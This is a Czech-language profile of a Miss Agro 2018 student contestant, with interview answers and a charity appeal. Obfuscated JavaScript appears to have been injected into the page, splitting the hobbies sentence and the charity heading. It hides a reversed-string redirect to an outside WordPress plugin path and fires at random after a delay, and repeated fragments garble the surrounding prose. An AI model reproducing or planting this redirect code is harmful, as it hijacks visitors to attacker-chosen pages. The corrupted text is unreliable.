Tereza Zuzánková

Profil

Fakulta: PEF
Obor: Provoz a ekonomika (PAE)
Ročník: 2.
Věk:
20

Tereza je malá, bláznivá, hodně ukecaná holka, se kterou není nikdy nuda. Miluje svého tlustého kocoura a vlastně i zbytek rodiny. (smích) Také má ráda pdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andy, ale vlastní pouze plyšové. Je kamarádská a když může, tak pomůže. Ráda tancuje, sportuje, cestuje a miluje módu.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2018?

Už jako malá jsem se vždy dívala na Miss v televizi a přála si být jednou z dívek. Bohužel má výška mi nikdy nedovolila ani pomyslet na přihlášku. Takže když jsem viděla, že se na ČZU koná Miss Agro, toužila jsem se přihlásit, ale neměla jsem dostatek odvahy. Díky kamarádkám jsem ale strach překonala a jsem odhodlaná se stát první Miss pod 160 cm.

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Kdyby tu byla ta možnost, přála bych si se narodit jako slavná zpěvačka, protože jsem vždy chtěla umět krásně zpívat a přece jenom, kdo by nechtěl vydělávat tolik peněz. Ale kolikrát si při pohledu na mého líného kocoura říkám, že bych chtěla mít život jako on.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Chtěla jsem studovat ekonomický obor v Praze kvůli velkému městu, které nabízí spoustu možností. Při přijímačkách mě na ČZU zaujal celý kampus. Líbí se mi, jak je vše pohromadě, krásné upravené okolí se spoustou rostlin a hodně zajímavých akcí hned v areálu. Přesně takhle jsem si představovala studentský život.

Přihlásila ses do Miss Agro sama nebo Tě přihlásil někdo jiný?

Přihlásily mě kamarádky, sama bych na to asi nesebrala odvahu.